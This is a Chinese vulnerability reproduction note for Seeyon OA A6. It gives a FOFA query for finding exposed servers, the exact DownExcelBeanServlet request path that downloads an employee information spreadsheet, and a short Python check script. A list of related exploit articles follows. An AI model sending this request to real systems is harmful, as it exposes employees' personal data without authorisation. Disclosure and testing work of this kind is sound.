致远OA A6 员工敏感信息泄露
致远OA A6 员工敏感信息泄露
1.漏洞描述
seeyon OA A6版本存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。
2.复现过程
fofa:app=“致远A6”
payload:/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
浏览器访问https://IP:PORT/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
获取到员工信息excel表。
3.POC
import requeststarget = "http://IP:PORT"
url = target + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
res = requests.get(url, verify=False)
if res.status_code == 200 and b"[Content_Types].xml" in res.content and b"Excel.Sheet" in res.content:print("success")
else:print("no vulnerability")
4.refer
https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
致远OA A6 员工敏感信息泄露相关推荐
- 致远OA文件上传漏洞(含批量检测POC)
文章目录 文件上传 wpsAssistServlet 任意文件上传 漏洞描述 漏洞影响 网络测绘 批量检测POC ajax.do 任意文件上传 CNVD-2021-01627漏洞 漏洞描述 漏洞影响 ...
- 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现
为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 利用方式 04 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.致远OA wpsAssistServ ...
- 致远OA敏感信息泄露漏洞合集(含批量检测POC)
文章目录 前言 敏感信息泄露 A6 status.jsp 信息泄露漏洞 漏洞描述 漏洞影响 网络测绘 漏洞复现 POC 批量检测 getSessionList.jsp Session泄漏漏洞 漏洞描述 ...
- 致远OA V8.2 A8 A6 G6N 企业,事业,政府行政协同办公系统
致远OA V8.2 A8 A6 G6N 企业,事业,政府行政协同办公系统
- 郑州万向置业oa服务器信息,[办公OA]-致远OA控件安装说明
在使用OA之前,需要在浏览器中安装必要的插件(如Office控件),以方便OA系统提供更好地编辑和使用功能.插件的安装包括两大步骤,一是对浏览器进行设置,二是OA控件的安装.下面是详细步骤,请大家参照 ...
- 致远OA任意文件下载漏洞(CNVD-2020-62422)
文章目录 漏洞描述 影响版本 payload poc 漏洞复现 修复补丁 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 影响版本 致远OA A6-V5 致远OA ...
- 致远oa服务器端口怎么修改,致远oa服务器设置
致远oa服务器设置 内容精选 换一换 云耀云服务器创建成功后,您可以根据需求,修改云服务器的名称.系统支持批量修改多台云耀云服务器的名称,修改完成后,这些云耀云服务器的名称相同.登录控制台.单击管理控 ...
- 致远OA管理员密码的重置
管理员账号忘记了,然后致远OA的运维服务也到期了,怎么办? 求人不如求自己,我们来看看到底怎么修改相关的管理员密码吧. 注意一:更新后需要重启OA应用方可生效. 注意二:更新后的密码是OA系统预设密码 ...
- 浅谈“敏感信息泄露“
一:漏洞名称: 敏感信息泄露 描述: 敏感数据包括但不限于:口令.密钥.证书.会话标识.License.隐私数据(如短消息的内容).授权凭据.个人数据(如姓名.住址.电话等)等,在程序文件.配置文件. ...
- 致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现
为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 验证方式 04 利用方式 05 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.由于致远OA旧版本某 ...
最新文章
- 二十年后我发明了保姆机器人作文_我想发明保姆机器人作文700字
- python中itemgetter函数_Python中的sorted函数以及operator.itemgetter函数
- 随机信号通过带通滤波器
- java中数组属于哪种类型_在Java中,关于数组描述正确的是
- 刷新DNS解析缓存+追踪+域名解析命令
- linux-pcap 抓包程序框架
- blood vessel 图像分割_单图像九宫格形式发送朋友圈
- VS Code 调试 Angular 和 TypeScript 的配置
- 计算机408真题_2019年计算机统考408真题第8题及其解析
- 卡尔曼滤波 KF | 扩展卡尔曼滤波 EKF (思路流程和计算公式)
- 20165232 结对编程第二周总结
- 化工原理计算机辅助设计,化工原理课程设计心得体会
- c语言博物馆文物管理系统,博物馆文物智能管理系统.docx
- 提取Windows主题中的图片
- java 将对象写入链表_在Java中,_____类可用于创建链表数据结构的对象。
- C语言BCC异或效验
- Gogs生产环境搭建和数据迁移指南
- tf.saved_model.save报错解决
- 二叉树剪枝_二叉树遍历与剪枝
- h5滚动时侧滑出现_HTML5移动端触摸事件以及滑动翻页效果
热门文章
- 网页游戏外挂的设计与编写:QQ摩天大楼【二】(登陆准备-信息处理方式)
- html中的em的使用方法,css布局的em的使用方法
- bat脚本_更改文件夹访问权限
- 暑假教师计算机培训总结,教师信息化培训心得(精选5篇)
- 大一上:计算机导论复习(每章分值、常考题型以及部分章节课后习题答案【网上没有,老师自己做的】)
- Protobuf协议格式详解
- glassfish mysql datasource_GlassFish连接池(GlassFish connection pool)
- 宽带光纤接入网的概念和典型应用类型
- 计算机音乐按键有声音,计算器上的声音键是哪个键
- 【转】如何使html5语义化标签兼容ie